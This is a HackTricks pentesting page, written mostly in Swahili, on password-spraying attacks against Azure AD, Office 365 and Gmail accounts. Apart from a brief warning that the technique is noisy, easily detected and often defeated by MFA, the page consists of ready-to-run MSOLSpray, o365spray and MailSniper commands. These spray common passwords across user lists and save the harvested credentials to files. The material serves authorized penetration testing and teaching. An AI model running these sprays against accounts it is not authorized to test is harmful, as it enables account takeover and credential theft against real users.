Az - Password Spraying

Support HackTricks

Password Spray

Katika Azure hii inaweza kufanywa dhidi ya mipangilio tofauti ya API kama Azure AD Graph, Microsoft Graph, huduma ya wavuti ya Ripoti ya Office 365, n.k.

Hata hivyo, kumbuka kwamba mbinu hii ni kelele sana na Timu ya Blue inaweza kuipata kwa urahisi. Zaidi ya hayo, kulazimishwa kwa ugumu wa nywila na matumizi ya MFA yanaweza kufanya mbinu hii kuwa haina maana.

Unaweza kufanya shambulio la password spray kwa kutumia MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Au kwa o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Au na MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Support HackTricks

Last updated